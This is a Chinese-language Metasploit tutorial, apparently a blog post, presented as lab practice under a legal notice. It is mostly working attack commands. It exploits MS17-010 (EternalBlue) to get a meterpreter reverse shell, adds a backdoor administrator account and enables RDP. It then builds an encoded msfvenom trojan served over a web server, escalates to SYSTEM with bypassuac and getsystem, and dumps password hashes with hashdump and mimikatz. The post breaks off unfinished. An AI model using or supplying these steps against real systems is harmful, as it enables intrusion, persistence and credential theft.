中华人民共和国网络安全法
阅读本文前,请熟读并遵守中华人民共和国网络安全法: www.npc.gov.cn/npc/c30834/…
msf简介
msf(The Metasploit framewok)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。
msfconsole
作用:管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。 运行命令
msfconsole
数字代表模块功能数量
模块简介:
- exploits:利用漏洞进行攻击模块
- payloads:攻击载荷(攻击效果控制),执行在exploits后
- auxiliaru:信息收集,扫描,嗅探,辅助模块(扫描工具等)
- post:后渗透模块(提取信息)
- encoders:编码模块
- nops:无操作生成器
基本命令
这里注意:漏洞ms17-010是windows上smb服务的一个漏洞,如果想测试此漏洞,可以在虚拟机中安装带有此漏洞的windows进行测试。
//查看某个漏洞信息
search ms17-010
可利用漏洞信息依次是:
漏洞编号,名称,描述。。。
//进入指定编号漏洞
use 1
//进入后,输入info,查看漏洞详细信息
info
其中上图的信息,显示基础配置,红框中yes为必须设置项,当然也存在默认值
//设置rhosts 参数
set rhosts 192.168.10.106
//运行脚本,完成探测
run 或者 exploit
上面用的是auxiliary模块,接下来用exp攻击模块
//切换到ms17010永恒之蓝模块
use 2
//查看信息
info
//设置rhost
set rhosts 192.168.10.106
//设置payload模块,windows/x64/meterpreter/reverse_tcp可以接收到反射shell,以此控制目标
set payload windows/x64/meterpreter/reverse_tcp
//查看参数信息,可以看到payload的lhost已经默认了,如果没有,请set lhost进行配置
show options
//执行脚本,就可以进入到反弹的meterpreter中,然后进行一些操作
run
这里介绍几个window命令,方便操作
//查看用户权限
getuid
//进入window命令行
shell
//修改编码格式为utf-8
chcp 65001
//新建用户
net user test 123456 /add
//添加用户到管理员组
net localgroup administrators test /add
//退出windows的shell
exit
//运行后渗透模块,开启对方的3389服务,然后就可以运行远程桌面登陆了
run post/windows/manage/enable_rdp
内网信息收集
首先生成一个病毒
msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.10.30 lport=4444 -f exe -e x86/shikata_ga_nai -i 10 -a x86 --platform windows > 1.exe
- -e :编码器
- -i :编码次数
- -a:指定架构
- --platform :指定平台
//将文件拷贝到服务器根目录并启动服务器
sudo cp 1.exe /var/www/html/
systemctl start apache2
//进入msfconsole
msfconsole
//使用模块
use exploit/multi/handler
//设置负载
set payload windows/meterpreter/reverse_tcp
//设置lhost
set lhost 192.168.10.30
//运行起来,等待反弹
run -j
在另一台window上下载并运行上面我们只做的病毒,就可以在kali中看到回弹的shell
//查看当前所有会话
sessions
//进入会话1
sessions -i 1
此时我们就可以随意操作了,比如按照上面的操作进入window的shell操作一些内容,也可以收集一些信息
//获取磁盘分区
run post/windows/gather/forensics/enum_drives
//检查机器是否为虚拟机
run post/windows/gather/checkvm
//查看运行了那些应用
run post/windows/gather/enum_applications
//运行了那些服务
run post/windows/gather/enum_services
//查询它的共享
run post/windows/gather/enum_shares
//查看版本,补丁,方便我们查找漏洞
run post/windows/gather/enum_patches
//run post/windows/gather/enum 命令后面 按tab 查看能运行的各种指令
凭证窃取
- 这里说的凭证就是一些文件的hash值,因为window不会以明文存储密码
- win的密码以hash值方式存储在sam文件中
- 获取hasd的前提条件是system权限,可以使用后渗透模块
紧接上面的命令行运行
//后台运行
background
//运行window提权模块
use exploit/windows/local/bypassuac
//查看参数,设置session
show options
set session 1
//运行服务,查看当前权限
run
getuid
//进行提权,此时在查看权限,就可以看到我们是一个system权限
getsystem
//查看系统,进程,并迁移当前进程到system的一个进程,比如2104
sysinfo
ps
migrate 2104
//运行命令,获取hash
run post/windows/gather/hashdump
run post/windows/gather/smart_hashdump
这里介绍一款密码抓取神器,mimikatz,msf已经集成了,
//加载mimikatz
load mimikatz
//查看命令
?
//抓取信息
msv
kerberos
等等其他命令
未完待续。。。